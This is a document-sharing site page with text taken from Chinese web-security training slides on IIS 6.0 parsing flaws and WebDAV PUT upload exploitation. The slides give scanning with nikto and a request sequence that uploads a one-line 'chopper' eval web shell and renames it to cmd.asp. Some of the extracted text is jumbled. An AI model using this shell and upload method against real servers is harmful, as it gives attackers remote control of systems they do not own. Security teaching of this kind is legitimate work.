原创力文档- 3
- 0
- 约1.83千字
- 约 15页
- 2024-03-24 发布于陕西
- 举报
Web攻防训练营
中间件解析漏洞-IIS6.0
课程内容
1.IIS6.0解析漏洞介绍3.IIS6.0PUT上传探测
2.IIS6.0PUT上传原理4.IIS6.0PUT上传利用
01
IIS6.0解析漏洞介绍
IIS6.0解析漏洞介绍
(1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件解析。
%=NOW()%
(2)当文件*.asp;1.jpgIIS6.0同样会将文件作为asp文件解析。
微目前也没有推出补丁,不认为是一个漏洞。
下面在IIS6.0中演示这两个解析漏洞
02
IIS6.0PUT上传原理
IIS6.0PUT上传原理
WebDAV基于HTTP1.1协议的通信协议使得HTTP支持PUTMOVECOPYDELETE方法。
1、探测是否存在IISPUT漏洞:3、通过Move或Copy重名
OPTIONS/HTTP1.1COPY/a.txtHTTP1.1
Host:Host:
Destination:
2、上传txt文本文件/cmd.asp
PUT/a.txtHTTP1.1
Host:
Content-Length:304、删除
DELETE/a.txtHTTP1.1
%evalrequest(chopper)%Host:
03
IIS6.0PUT上传探测
IIS6.0PUT上传探测
利用nikto探测
-nikto-hIP地址
04
IIS6.0PUT上传利用
IIS6.0PUT上传利用
利用Burpsuite进行IISPUT漏洞利用。先OPTIONS探测、PUT、MOVE、DELETE
IIS6.0PUT上传利用
利用Burpsuite进行IISPUT漏洞利用。先OPTIONS探测、PUT、MOVE、DELETE
IIS6.0PUT上传利用
利用Burpsuite进行IISPUT漏洞利用。先OPTIONS探测、PUT、MOVE、DELETE
IIS6.0PUT上传利用
利用Burpsuite进行IISPUT漏洞利用。先OPTIONS探测、PUT、MOVE、DELETE
总结
1.IIS6.0解析漏洞介绍3.IIS6.0PUT上传探测
2.IIS6.0PUT上传原理4.IIS6.0PUT上传利用
再见
欢迎关注Web安全训练营课程
您可能关注的文档
- Web攻防视频教程第一节 命令执行介绍-01.pdf
- Web攻防视频教程第一节 命令执行介绍-01.pptx
- Web攻防视频教程第一节 收集Whois信息-01.pdf
- Web攻防视频教程第一节 文件上传-绕过JS验证-01.pdf
- Web攻防视频教程第一节 文件上传-绕过JS验证-01.pptx
- Web攻防视频教程第一节 中间件解析漏洞-IIS6.0-01.pptx
- Web攻防视频教程第一节 自动化xss挖掘介绍-01.pdf
- Web攻防视频教程第一节 自动化xss挖掘介绍-01.pptx
- Web攻防视频教程逻辑漏洞 - 密码重置(简单验证码)-01.pdf
- Web攻防视频教程逻辑漏洞 - 密码重置(简单验证码)-01.pptx
最近下载
- 2019款一汽丰田卡罗拉_汽车使用手册用户操作图解驾驶车主车辆说明书电子版.pdf
- 2026年春季人教版小学数学三年级下册教学计划(含进度表).docx VIP
- 长安三万里 中英文字幕.docx VIP
- 长安三万里中英文字幕.pptx VIP
- 早孕关爱门诊咨询要点专家共识(2025年版).pptx VIP
- 汽车行走的艺术知到智慧树期末考试答案题库2025年吉林大学.docx VIP
- (2026春新版本) 部编版道德与法治三年级下册全册教学设计.docx
- TCQFX001-2024四川省机动车维修工时定额标准.pptx VIP
- ASTM E92-2023中文版,维氏硬度试验.pdf VIP
- Roland罗兰VM-3100PRO MIDI使用说明书.pdf
文档评论(0)